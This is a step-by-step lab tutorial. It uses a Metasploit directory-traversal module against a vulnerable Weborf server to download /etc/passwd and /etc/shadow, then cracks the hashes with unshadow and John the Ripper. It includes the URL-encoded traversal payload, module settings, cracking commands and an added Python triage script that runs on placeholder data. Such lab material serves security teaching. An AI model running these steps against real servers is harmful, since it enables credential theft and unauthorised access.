Post-Exploit Password Cracking
In previous posts, we covered several ways of obtaining the contents of the /etc/shadow file, where user password hashes are stored. In this post, we will grab /etc/shadow (together with /etc/passwd) from the compromised system in yet another way, and then walk through cracking the hashes to recover the actual passwords. Let's see, step by step, how post-exploit password cracking works.
Step 1: Starting Vulnerable Server
First, let's start our vulnerable server application as root:
Now open a new terminal tab with Ctrl + Shift + T.
Step 2: Creating File List
We already saw how the directory traversal vulnerability in Weborf can be exploited manually. In this post, we will automate the process with Metasploit and combine it with downloading the password files. The Metasploit auxiliary module we will use requires a file list telling it which files to download from the compromised system. Create the file list as shown below. Note the URL encoding: each "/" in a path is written as "%2f". The paths have no leading slash, because the traversal sequence we set in TRIGGER (Step 5) is prepended to them:
cat > files.txt
etc%2fpasswd
etc%2fshadow
Press ENTER, then hit Ctrl+D to save the file and return to the prompt.
Step 3: Starting Metasploit Framework
Now start the Metasploit Framework. Don't forget the -L option.
Step 4: Selecting Module
Next, let's select the Generic HTTP Directory Traversal Utility module. It checks the targets for a directory traversal vulnerability and, depending on the selected ACTION, can either download specific files or check whether it is possible to write files outside the web root. Select the module as follows:
Step 5: Setting Scanner Options
There are quite a few options we need to set for this module. The first two should be familiar by now: RHOSTS for the remote (target) host(s) and RPORT for the target port (which defaults to 80, so we need to change it to Weborf's default port, 8080). The next three options are TRIGGER, the path that triggers the vulnerability (here a chain of URL-encoded ../ sequences), ACTION, which in our case is DOWNLOAD, and FILELIST, which names the list of files to download. Set the options exactly as shown below:
set RHOSTS skillsetlocal.com
set RPORT 8080
set TRIGGER ..%2f..%2f..%2f..%2f..%2f..%2f..%2f
set ACTION DOWNLOAD
set FILELIST files.txt
Make sure to type DOWNLOAD in all capital letters; otherwise you will get an error.
Step 6: Running Scan
Now enter run to launch the attack.
The scan finishes very quickly, and the output should report that both target files were downloaded. Note the location where the files were saved (the Metasploit loot directory); we will use it in the next step.
Enter exit to close Metasploit Framework and return to the regular prompt.
Step 7: Unshadow
For the purpose of cracking, we’ll use John the Ripper. Here’s a description from the maker openwall:
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS (the latter requires a contributed patch). Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos/AFS and Windows LM hashes, as well as DES-based tripcodes, plus many more hashes and ciphers in "community enhanced" -jumbo versions and/or with other contributed patches.
Reference - http://www.openwall.com/john/doc/
Sounds like it's perfect for the job. We could run JtR directly on the /etc/shadow file, but a better approach is to build a combined file with unshadow, which also lets JtR use information from the GECOS field of /etc/passwd (full names and the like) as candidate passwords. Run unshadow on the two files downloaded by the Metasploit module. The format is unshadow PASSWDFILE SHADOWFILE, in that order, so make sure you give the file names in the right order. The two loot file names look almost identical; you can tell them apart by their contents, since the passwd file has an x in the second colon-separated field and seven fields per line, while the shadow file carries the hashes in the second field and has nine. The yyyymmddhhmmss part is the timestamp, and xxxxxx and yyyyyy are numeric identifiers that differ between the /etc/passwd and /etc/shadow loot files. We are saving the new file as passwords.
sudo unshadow .msf4/loot/yyyymmddhhmmss_default_127.0.0.1_lfi.data_xxxxxx.txt .msf4/loot/yyyymmddhhmmss_default_127.0.0.1_lfi.data_yyyyyy.txt > passwords
For example, with the loot files from our run:
sudo unshadow .msf4/loot/20200826071515_default_127.0.0.1_lfi.data_827959.txt .msf4/loot/20200826071515_default_127.0.0.1_lfi.data_297245.txt > passwords
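As an added example (not part of the original post, and not code from the John the Ripper project), the Python script below does what unshadow does on two constructed sample files, and adds the two checks a practitioner wants before starting a crack: telling the near-identically named loot files apart by their field count, and sorting the merged records into accounts that carry a real crypt(3) hash, locked accounts (a "!" or "*" in the password field), and accounts with no shadow entry at all. The passwd/shadow contents and the hash strings are constructed placeholders in the right shape, not hashes of any real password; the helper names are this example's own.

```python
"""Merge passwd and shadow the way unshadow(8) does, then triage the result.

Added example for the tutorial above, not the JtR project's own code. All
input data below is constructed; the hash strings are placeholders with the
right crypt(3) prefix and alphabet, not real hashes.
"""
import re
from typing import Dict, List

# Constructed sample /etc/passwd: seven colon-separated fields per record.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice Example,,,:/home/alice:/bin/bash
bob:x:1001:1001:Bob Example:/home/bob:/bin/bash
carol:x:1002:1002:Carol Example:/home/carol:/bin/bash
dave:x:1003:1003:Dave Example:/home/dave:/bin/bash
"""

# Constructed sample /etc/shadow: nine fields per record. dave has no entry,
# root and daemon are locked, carol's hash is locked with a leading "!".
SAMPLE_SHADOW = """\
root:!:18500:0:99999:7:::
daemon:*:18500:0:99999:7:::
alice:$6$saltsalt$placeholderHashAbcdefghijklmnopqrstuvwxyz0123456789/placeholder.:18500:0:99999:7:::
bob:$y$j9T$saltsaltsaltsaltsaltsa$placeholderHashAbcdefghijklmnopqrst:18500:0:99999:7:::
carol:!$6$saltsalt$placeholderHashZyxwvutsrqponmlkjihgfedcba9876543210/placeholder.:18500:0:99999:7:::
"""


def parse_colon_file(text: str) -> List[List[str]]:
    """Split a passwd/shadow-style file into field lists, skipping blank lines."""
    return [line.split(":") for line in text.splitlines() if line.strip()]


def classify_file(text: str) -> str:
    """Distinguish a passwd file (7 fields) from a shadow file (9 fields).

    Handy when both loot files share a generic name and differ only by id.
    """
    counts = {len(fields) for fields in parse_colon_file(text)}
    if counts == {7}:
        return "passwd"
    if counts == {9}:
        return "shadow"
    return "unknown"


def unshadow(passwd_text: str, shadow_text: str) -> str:
    """Keep every passwd record, in order, and replace its password field
    with the hash from the matching shadow record (same behaviour as
    unshadow PASSWDFILE SHADOWFILE). Users without a shadow entry keep "x"."""
    shadow_by_user = {f[0]: f[1] for f in parse_colon_file(shadow_text)}
    merged = []
    for fields in parse_colon_file(passwd_text):
        user = fields[0]
        if user in shadow_by_user:
            fields = [user, shadow_by_user[user]] + fields[2:]
        merged.append(":".join(fields))
    return "\n".join(merged) + "\n"


# crypt(3) hash identifiers and the common names John reports for them.
_PREFIXES = [
    ("$1$", "md5crypt"),
    ("$2a$", "bcrypt"), ("$2b$", "bcrypt"), ("$2y$", "bcrypt"),
    ("$5$", "sha256crypt"),
    ("$6$", "sha512crypt"),
    ("$7$", "scrypt"),
    ("$y$", "yescrypt"),
    ("$gy$", "gost-yescrypt"),
]


def hash_kind(field: str) -> str:
    """Classify one password field: a hash type name, "locked" for !/* or a
    "!"-prefixed hash, "empty", "des" for a legacy 13-character descrypt hash,
    or "unknown" (e.g. the "x" of a record with no shadow entry)."""
    if field == "":
        return "empty"
    if field.startswith(("!", "*")):
        return "locked"
    for prefix, name in _PREFIXES:
        if field.startswith(prefix):
            return name
    if re.fullmatch(r"[./0-9A-Za-z]{13}", field):
        return "des"
    return "unknown"


def triage(merged_text: str) -> Dict[str, str]:
    """Map each user in an unshadowed file to the kind of password field it has."""
    return {f[0]: hash_kind(f[1]) for f in parse_colon_file(merged_text)}


def crackable_users(merged_text: str) -> List[str]:
    """Users whose field is an actual hash worth handing to John."""
    return [u for u, k in triage(merged_text).items()
            if k not in ("locked", "empty", "unknown")]


if __name__ == "__main__":
    print("first file:", classify_file(SAMPLE_PASSWD))
    print("second file:", classify_file(SAMPLE_SHADOW))
    merged = unshadow(SAMPLE_PASSWD, SAMPLE_SHADOW)
    print(merged)
    for user, kind in triage(merged).items():
        print(f"{user:8s} {kind}")
    print("worth cracking:", crackable_users(merged))
```

Running the script on the sample data reports the first file as passwd and the second as shadow, prints the merged file, and lists alice (sha512crypt) and bob (yescrypt) as the only accounts worth cracking; root, daemon and carol are locked and dave never had a shadow entry. Knowing the hash type up front matters because per-guess cost, and therefore cracking time, differs enormously between md5crypt, sha512crypt and yescrypt.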
Let's view the new file to make sure everything went OK:
Let's get cracking!
Step 8: Running John the Ripper
Issue the following command to use JtR with our passwords file with default options.
sudo john passwords
With no options, John runs its default modes in order: single crack (which is where the GECOS information merged in by unshadow is used), then its built-in wordlist with mangling rules, then incremental brute force. Be aware that in a real engagement a crack can take days, but simple passwords like "password1" or "password2" fall very quickly.
Step 9: Reading Wordlist
For stronger passwords, we can look at the available JtR options, such as using a wordlist. There are many large wordlists available on the Internet, some of them included with the standard Kali Linux installation. You can also create your own, which we did for this lab. Issue the following command to read it:
To speed up the process, we cheated a bit and included only the actual user passwords. Feel free to experiment later and try adding more words or use different JtR options.
Step 10: Running JtR with Wordlist
To use the wordlist, simply reissue the command and add the -w option (short for --wordlist) pointing to the file:
sudo john passwords -w=wordlist.txt
The remaining passwords are now cracked.
Also notice that John does not redo earlier work: it records every cracked hash in its pot file (john.pot) and skips those hashes in later runs, so only the passwords left uncracked by the previous session are attacked.
Step 11: Viewing Cracked Passwords
To list the passwords cracked from a given file, use the --show option. Keep using sudo as before, so that John reads the same pot file the earlier runs wrote:
sudo john --show passwords